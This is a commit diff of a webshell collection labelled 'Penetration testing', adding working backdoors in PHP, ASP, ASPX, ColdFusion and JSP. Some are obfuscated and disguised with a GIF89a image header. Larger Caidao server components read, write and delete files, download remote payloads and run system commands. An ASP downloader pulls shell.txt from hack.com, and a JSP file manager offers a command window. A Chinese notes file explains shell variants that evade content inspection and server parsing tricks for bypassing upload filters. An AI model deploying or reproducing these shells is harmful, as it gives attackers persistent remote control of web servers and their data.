update webshell Penetration testing2013 beta

caidao-shell/404.php

@@ -0,0 +1 @@
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>

caidao-shell/download 下载文件.asp

@@ -0,0 +1,11 @@
+<%
+Set xPost = createObject("Microsoft.XMLHTTP")
+ xPost.Open "GET","http://hack.com/shell.txt",0
+ xPost.Send()
+ Set sGet = createObject("ADODB.Stream")
+ sGet.Mode = 3
+ sGet.Type = 1
+ sGet.Open()
+ sGet.Write(xPost.responseBody)
+ sGet.SaveToFile "D:\website\jingsheng\Templates\heise\html\shell.asp",2  
+ %>

caidao-shell/fuck.php

@@ -0,0 +1 @@
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>

caidao-shell/guo.php

@@ -0,0 +1 @@
+<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

caidao-shell/hkmjj.asp

@@ -0,0 +1,22 @@
+<%   
+codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"  
+execute (decode (codeds) )   
+Function DeCode (Coded)   
+    On Error Resume Next  
+    For i = 1 To Len (Coded)   
+        Curchar = Mid (Coded, i, 1)   
+        If Asc (Curchar) = 16 then   
+            Curchar = chr (8)   
+Elseif Asc (Curchar) = 24 then   
+            Curchar = chr (12)   
+Elseif Asc (Curchar) = 32 then   
+            Curchar = chr (18)   
+        Else    
+            Curchar = chr (Asc (Curchar) -3)   
+        End if   
+        DeCode = Decode&Curchar   
+    Next  
+End Function  
+'response.write(decode(codeds)) 
+' ²Ëµ¶Á¬½Ó /hkmjj.asp?xx=x ,ÃÜÂë hkmjj
+%>

caidao-shell/ice.asp

@@ -0,0 +1,2 @@
+GIF89a
+<%eval request("ice")%>

caidao-shell/ice.aspx

@@ -0,0 +1,2 @@
+GIF89a
+<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>

caidao-shell/ice.cfm

@@ -0,0 +1,27 @@
+<CFSET O="" /><CFTRY><CFSWITCH EXPRESSION=#Form.ice#><CFCASE VALUE="A"><CFSCRIPT>O=O&Expandpath("./")&Chr(9);
+for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";}</CFSCRIPT></CFCASE><CFCASE VALUE="B">
+<CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type"><CFLOOP Query="D"><CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/";
+O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9);
+If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT></CFLOOP></CFCASE><CFCASE VALUE="C">
+<CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O"></CFCASE><CFCASE VALUE="D"><CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#">
+<CFSET O="1" /></CFCASE><CFCASE VALUE="E"><CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0;
+if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();}
+DF(Form.z1);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="F"><cffile action="readbinary" file="#Form.z1#" variable="B" />
+<cfset J=CreateObject("java","java.nio.ByteBuffer") /><cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) />
+<cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) /><cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) />
+<cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) /><CFCONTENT Type="application/octet-stream" Variable="#X.Array()#">
+<CFABORT></CFCASE><CFCASE VALUE="G"><CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1);
+h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));}
+F.close();O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="H"><CFFUNCTION Name="cpf"><CFARGUMENT Name="S"><CFARGUMENT Name="D">
+<CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#"></CFFUNCTION><CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S);
+df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles();
+for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{
+cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT></CFCASE>
+<CFCASE VALUE="I"><CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="J">
+<CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" /></CFCASE><CFCASE VALUE="K"><CFSCRIPT>
+FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="L"><CFSCRIPT>Z=Form.z2;
+For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT>
+<CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" /></CFCASE><CFCASE VALUE="M">
+<CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" />
+</CFCASE></CFSWITCH><CFCATCH Type="Any"><CFSET O="ERROR:// "&CFCatch.Message /></CFCATCH>
+</CFTRY><CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT>

caidao-shell/ice.jsp

@@ -0,0 +1,59 @@
+<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
+<%!
+String Pwd="ice";
+String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
+Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
+Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
+void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
+void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
+SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
+sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
+else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
+void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
+for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
+void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
+ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
+os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
+void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
+FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
+{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
+void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
+for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
+}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
+int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
+void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
+void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
+void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
+HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
+while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
+void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
+while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
+void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
+while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
+void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
+while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
+void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
+Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
+for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
+void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
+try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
+}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
+catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
+}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
+%><%
+String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
+String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
+StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
+if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
+else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
+while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
+else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
+bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
+else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
+else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
+else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
+MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
+else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
+}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
+%>

caidao-shell/ice.php

@@ -0,0 +1 @@
+<?php ${${eval($_POST[ice])}};?>

caidao-shell/说明.log

@@ -0,0 +1,86 @@
+   GIF89a   图片头
+
+[+]---------------------------------PHP---------------------------------[+]
+<?php @eval($_POST['ice']);?>
+
+<?php header('status:404');${${eval($_POST[ice])}};?>
+
+<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
+
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
+
+
+<?fputs(fopen("ice.php","w"),"<?eval(\$_POST[ice]);?>")?>  
+
+<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
+// 同目录生成 ice.php
+
+[+]---------------------------------PHP---------------------------------[+]
+
+
+
+***************************************************************************
+
+
+
+[+]---------------------------------ASP---------------------------------[+]
+<%eval request("ice")%>
+
+<%www=REquEst("ice"):EvaL(www)%>
+
+<%
+Dim ConKey:ConKey="ice"
+Dim InValue:InValue=Request(ConKey)
+eval(InValue)
+%>
+
+<%E=request("ice") execute E%>
+
+<%
+Set xPost = createObject("Microsoft.XMLHTTP")
+ xPost.Open "GET","http://www.xxx.com/shell.txt",0 'asp木马文本格式地址
+ xPost.Send()
+ Set sGet = createObject("ADODB.Stream")
+ sGet.Mode = 3
+ sGet.Type = 1
+ sGet.Open()
+ sGet.Write(xPost.responseBody)
+ sGet.SaveToFile "E:\WWWROOT\xxx.asp",2 
+ %>
+
+
+ ┼攠數畣整爠煥敵瑳∨≡┩愾    // ANSI—>Unicode ，密码: a
+ ┼攠數畣整爠煥敵瑳∨捩≥┩愾  //密码 ice
+
+
+
+上传一个图片一句话(xxx.jpg)。再上传一个.asp文件去包含:  <!--#include file="xxx.jpg" --> 
+
+
+[+]---------------------------------ASP---------------------------------[+]
+
+
+
+***************************************************************************
+
+
+
+[+]---------------------------------ASPX---------------------------------[+]
+
+<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
+
+<%@ Page Language="C#" ValidateRequest="false" %>
+<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["ice"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[] { this },null,null);}catch{ }%>
+
+[+]---------------------------------ASPX---------------------------------[+]
+  
+ IIS 6.0 解析:  x.asp/x.jpg  x.asp;x.jpg ；如果遇到安全狗，畸形会被拦截，可以尝试将一句话的文件名改为  ;x.asp;x.jpg (IIS 7.5 可以试试 a.aspx.a;.a.aspx.jpg..jpg 这样的)
+ Nginx 解析:    x.jpg/.php   x.jpg%00.php  
+ Apache : x.php.x
+ xx.jpg.jsp,xx.png.jsp
+
+
+ 以上为 php、asp、aspx一句话木马的客户端，密码均为 ice 。这是一句话的几种写法，有些可以逃过内容审查
+
+                                                     -- 冰锋刺客 --   
+                                                      2012-07-21

jsp/suiyue.jsp

@@ -0,0 +1,993 @@
+<%
+/**
+JFolder V0.9  windows platform
+@Filename： JFolder.jsp 
+@Description： 一个简单的系统文件目录显示程序，类似于资源管理器，提供基本的文件操作，不过功能较弱。
+
+@Bugs  :  下载时，中文文件名无法正常显示123456789
+*/
+%>
+<%@ page contentType="text/html;charset=gb2312"%>
+<%@page import="java.io.*,java.util.*,java.net.*" %>
+<%!
+private final static int languageNo=0; //语言版本，0 : 中文； 1：英文
+String strThisFile="JFolder.jsp";
+String[] authorInfo={" <font color=red> 岁月-版权【冰锋刺客-整理】 </font>"," <font color=red> Thanks for your support - - by Syue http://www.syue.com </font>"};
+String[] strFileManage   = {"文 件 管 理","File Management"};
+String[] strCommand      = {"CMD 命 令","Command Window"};
+String[] strSysProperty  = {"系 统 属 性","System Property"};
+String[] strHelp         = {"帮 助","Help"};
+String[] strParentFolder = {"上级目录","Parent Folder"};
+String[] strCurrentFolder= {"当前目录","Current Folder"};
+String[] strDrivers      = {"驱动器","Drivers"};
+String[] strFileName     = {"文件名称","File Name"};
+String[] strFileSize     = {"文件大小","File Size"};
+String[] strLastModified = {"最后修改","Last Modified"};
+String[] strFileOperation= {"文件操作","Operations"};
+String[] strFileEdit     = {"修改","Edit"};
+String[] strFileDown     = {"下载","Download"};
+String[] strFileCopy     = {"复制","Move"};
+String[] strFileDel      = {"删除","Delete"};
+String[] strExecute      = {"执行","Execute"};
+String[] strBack         = {"返回","Back"};
+String[] strFileSave     = {"保存","Save"};
+
+public class FileHandler
+{
+ private String strAction="";
+ private String strFile="";
+ void FileHandler(String action,String f)
+ {
+ 
+ }
+}
+
+public static class UploadMonitor {
+
+  static Hashtable uploadTable = new Hashtable();
+
+  static void set(String fName, UplInfo info) {
+   uploadTable.put(fName, info);
+  }
+
+  static void remove(String fName) {
+   uploadTable.remove(fName);
+  }
+
+  static UplInfo getInfo(String fName) {
+   UplInfo info = (UplInfo) uploadTable.get(fName);
+   return info;
+  }
+}
+
+public class UplInfo {
+
+  public long totalSize;
+  public long currSize;
+  public long starttime;
+  public boolean aborted;
+
+  public UplInfo() {
+   totalSize = 0l;
+   currSize = 0l;
+   starttime = System.currentTimeMillis();
+   aborted = false;
+  }
+
+  public UplInfo(int size) {
+   totalSize = size;
+   currSize = 0;
+   starttime = System.currentTimeMillis();
+   aborted = false;
+  }
+
+  public String getUprate() {
+   long time = System.currentTimeMillis() - starttime;
+   if (time != 0) {
+    long uprate = currSize * 1000 / time;
+    return convertFileSize(uprate) + "/s";
+   }
+   else return "n/a";
+  }
+
+  public int getPercent() {
+   if (totalSize == 0) return 0;
+   else return (int) (currSize * 100 / totalSize);
+  }
+
+  public String getTimeElapsed() {
+   long time = (System.currentTimeMillis() - starttime) / 1000l;
+   if (time - 60l >= 0){
+    if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+    else return time / 60 + ":0" + (time % 60) + "m";
+   }
+   else return time<10 ? "0" + time + "s": time + "s";
+  }
+
+  public String getTimeEstimated() {
+   if (currSize == 0) return "n/a";
+   long time = System.currentTimeMillis() - starttime;
+   time = totalSize * time / currSize;
+   time /= 1000l;
+   if (time - 60l >= 0){
+    if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+    else return time / 60 + ":0" + (time % 60) + "m";
+   }
+   else return time<10 ? "0" + time + "s": time + "s";
+  }
+
+ }
+
+ public class FileInfo {
+
+  public String name = null, clientFileName = null, fileContentType = null;
+  private byte[] fileContents = null;
+  public File file = null;
+  public StringBuffer sb = new StringBuffer(100);
+
+  public void setFileContents(byte[] aByteArray) {
+   fileContents = new byte[aByteArray.length];
+   System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+  }
+}
+
+// A Class with methods used to process a ServletInputStream
+public class HttpMultiPartParser {
+
+  private final String lineSeparator = System.getProperty("line.separator", "\n");
+  private final int ONE_MB = 1024 * 1;
+
+  public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+    int clength) throws IllegalArgumentException, IOException {
+   if (is == null) throw new IllegalArgumentException("InputStream");
+   if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+     "\"" + boundary + "\" is an illegal boundary indicator");
+   boundary = "--" + boundary;
+   StringTokenizer stLine = null, stFields = null;
+   FileInfo fileInfo = null;
+   Hashtable dataTable = new Hashtable(5);
+   String line = null, field = null, paramName = null;
+   boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+   boolean isFile = false;
+   if (saveFiles) { // Create the required directory (including parent dirs)
+    File f = new File(saveInDir);
+    f.mkdirs();
+   }
+   line = getLine(is);
+   if (line == null || !line.startsWith(boundary)) throw new IOException(
+     "Boundary not found; boundary = " + boundary + ", line = " + line);
+   while (line != null) {
+    if (line == null || !line.startsWith(boundary)) return dataTable;
+    line = getLine(is);
+    if (line == null) return dataTable;
+    stLine = new StringTokenizer(line, ";\r\n");
+    if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+      "Bad data in second line");
+    line = stLine.nextToken().toLowerCase();
+    if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+      "Bad data in second line");
+    stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+    if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+      "Bad data in second line");
+    fileInfo = new FileInfo();
+    stFields.nextToken();
+    paramName = stFields.nextToken();
+    isFile = false;
+    if (stLine.hasMoreTokens()) {
+     field = stLine.nextToken();
+     stFields = new StringTokenizer(field, "=\"");
+     if (stFields.countTokens() > 1) {
+      if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+       fileInfo.name = paramName;
+       String value = stFields.nextToken();
+       if (value != null && value.trim().length() > 0) {
+        fileInfo.clientFileName = value;
+        isFile = true;
+       }
+       else {
+        line = getLine(is); // Skip "Content-Type:" line
+        line = getLine(is); // Skip blank line
+        line = getLine(is); // Skip blank line
+        line = getLine(is); // Position to boundary line
+        continue;
+       }
+      }
+     }
+     else if (field.toLowerCase().indexOf("filename") >= 0) {
+      line = getLine(is); // Skip "Content-Type:" line
+      line = getLine(is); // Skip blank line
+      line = getLine(is); // Skip blank line
+      line = getLine(is); // Position to boundary line
+      continue;
+     }
+    }
+    boolean skipBlankLine = true;
+    if (isFile) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+     if (line.trim().length() < 1) skipBlankLine = false;
+     else {
+      stLine = new StringTokenizer(line, ": ");
+      if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+        "Bad data in third line");
+      stLine.nextToken(); // Content-Type
+      fileInfo.fileContentType = stLine.nextToken();
+     }
+    }
+if (skipBlankLine) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+    }
+    if (!isFile) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+     dataTable.put(paramName, line);
+     // If parameter is dir, change saveInDir to dir
+     if (paramName.equals("dir")) saveInDir = line;
+     line = getLine(is);
+     continue;
+    }
+    try {
+     UplInfo uplInfo = new UplInfo(clength);
+     UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+     OutputStream os = null;
+     String path = null;
+     if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+       fileInfo.clientFileName));
+     else os = new ByteArrayOutputStream(ONE_MB);
+     boolean readingContent = true;
+     byte previousLine[] = new byte[2 * ONE_MB];
+     byte temp[] = null;
+     byte currentLine[] = new byte[2 * ONE_MB];
+     int read, read3;
+     if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+      line = null;
+      break;
+     }
+     while (readingContent) {
+      if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+       line = null;
+       uplInfo.aborted = true;
+       break;
+      }
+      if (compareBoundary(boundary, currentLine)) {
+       os.write(previousLine, 0, read - 2);
+       line = new String(currentLine, 0, read3);
+       break;
+      }
+      else {
+       os.write(previousLine, 0, read);
+       uplInfo.currSize += read;
+       temp = currentLine;
+       currentLine = previousLine;
+       previousLine = temp;
+       read = read3;
+      }//end else
+     }//end while
+     os.flush();
+     os.close();
+     if (!saveFiles) {
+      ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+      fileInfo.setFileContents(baos.toByteArray());
+     }
+     else fileInfo.file = new File(path);
+     dataTable.put(paramName, fileInfo);
+     uplInfo.currSize = uplInfo.totalSize;
+    }//end try
+    catch (IOException e) {
+     throw e;
+    }
+   }
+   return dataTable;
+  }
+
+  /**
+   * Compares boundary string to byte array
+   */
+  private boolean compareBoundary(String boundary, byte ba[]) {
+   byte b;
+   if (boundary == null || ba == null) return false;
+   for (int i = 0; i < boundary.length(); i++)
+    if ((byte) boundary.charAt(i) != ba[i]) return false;
+   return true;
+  }
+
+  /** Convenience method to read HTTP header lines */
+  private synchronized String getLine(ServletInputStream sis) throws IOException {
+   byte b[] = new byte[1024];
+   int read = sis.readLine(b, 0, b.length), index;
+   String line = null;
+   if (read != -1) {
+    line = new String(b, 0, read);
+    if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+   }
+   return line;
+  }
+
+  public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+   String path = null;
+   if (dir == null || fileName == null) throw new IllegalArgumentException(
+     "dir or fileName is null");
+   int index = fileName.lastIndexOf('/');
+   String name = null;
+   if (index >= 0) name = fileName.substring(index + 1);
+   else name = fileName;
+   index = name.lastIndexOf('\\');
+   if (index >= 0) fileName = name.substring(index + 1);
+   path = dir + File.separator + fileName;
+   if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+   else return path.replace('/', File.separatorChar);
+  }
+} //End of class HttpMultiPartParser
+
+String formatPath(String p)
+{
+ StringBuffer sb=new StringBuffer();
+ for (int i = 0; i < p.length(); i++) 
+ {
+  if(p.charAt(i)=='\\')
+  {
+   sb.append("\\\\");
+  }
+  else
+  {
+   sb.append(p.charAt(i));
+  }
+ }
+ return sb.toString();
+}
+
+ /**
+  * Converts some important chars (int) to the corresponding html string
+  */
+ static String conv2Html(int i) {
+  if (i == '&') return "&amp;";
+  else if (i == '<') return "&lt;";
+  else if (i == '>') return "&gt;";
+  else if (i == '"') return "&quot;";
+  else return "" + (char) i;
+ }
+
+ /**
+  * Converts a normal string to a html conform string
+  */
+ static String htmlEncode(String st) {
+  StringBuffer buf = new StringBuffer();
+  for (int i = 0; i < st.length(); i++) {
+   buf.append(conv2Html(st.charAt(i)));
+  }
+  return buf.toString();
+ }
+String getDrivers()
+/**
+Windows系统上取得可用的所有逻辑盘
+*/
+{
+ StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
+ File roots[]=File.listRoots();
+ for(int i=0;i<roots.length;i++)
+ {
+  sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
+  sb.append(roots[i]+"</a>&nbsp;");
+ }
+ return sb.toString();
+}
+static String convertFileSize(long filesize)
+{
+ //bug 5.09M 显示5.9M
+ String strUnit="Bytes";
+ String strAfterComma="";
+ int intDivisor=1;
+ if(filesize>=1024*1024)
+ {
+  strUnit = "MB";
+  intDivisor=1024*1024;
+ }
+ else if(filesize>=1024)
+ {
+  strUnit = "KB";
+  intDivisor=1024;
+ }
+ if(intDivisor==1) return filesize + " " + strUnit;
+ strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
+ if(strAfterComma=="") strAfterComma=".0";
+ return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
+}
+%>
+<%
+request.setCharacterEncoding("gb2312");
+String tabID = request.getParameter("tabID");
+String strDir = request.getParameter("path");
+String strAction = request.getParameter("action");
+String strFile = request.getParameter("file");
+String strPath = strDir + "\\" + strFile; 
+String strCmd = request.getParameter("cmd");
+StringBuffer sbEdit=new StringBuffer("");
+StringBuffer sbDown=new StringBuffer("");
+StringBuffer sbCopy=new StringBuffer("");
+StringBuffer sbSaveCopy=new StringBuffer("");
+StringBuffer sbNewFile=new StringBuffer("");
+
+if((tabID==null) || tabID.equals(""))
+{
+ tabID = "1";
+}
+
+if(strDir==null||strDir.length()<1)
+{
+ strDir = request.getRealPath("/");
+}
+
+
+if(strAction!=null && strAction.equals("down"))
+{
+ File f=new File(strPath);
+ if(f.length()==0)
+ {
+  sbDown.append("文件大小为 0 字节，就不用下了吧");
+ }
+ else
+ {
+  response.setHeader("content-type","text/html; charset=ISO-8859-1");
+  response.setContentType("APPLICATION/OCTET-STREAM"); 
+  response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
+  FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
+  out.clearBuffer();
+  int i;
+  while ((i=fileInputStream.read()) != -1)
+  {
+   out.write(i); 
+  }
+  fileInputStream.close();
+  out.close();
+ }
+}
+
+if(strAction!=null && strAction.equals("del"))
+{
+ File f=new File(strPath);
+ f.delete();
+}
+
+if(strAction!=null && strAction.equals("edit"))
+{
+ File f=new File(strPath); 
+ BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
+ sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
+ sbEdit.append("<input type=hidden name=action value=save >\r\n");
+ sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
+ sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
+ sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
+ sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
+ sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
+ String line="";
+ while((line=br.readLine())!=null)
+ {
+  sbEdit.append(htmlEncode(line)+"\r\n");  
+ }
+   sbEdit.append("</textarea>");
+ sbEdit.append("<input type=hidden name=path value="+strDir+">");
+ sbEdit.append("</form>");
+}
+
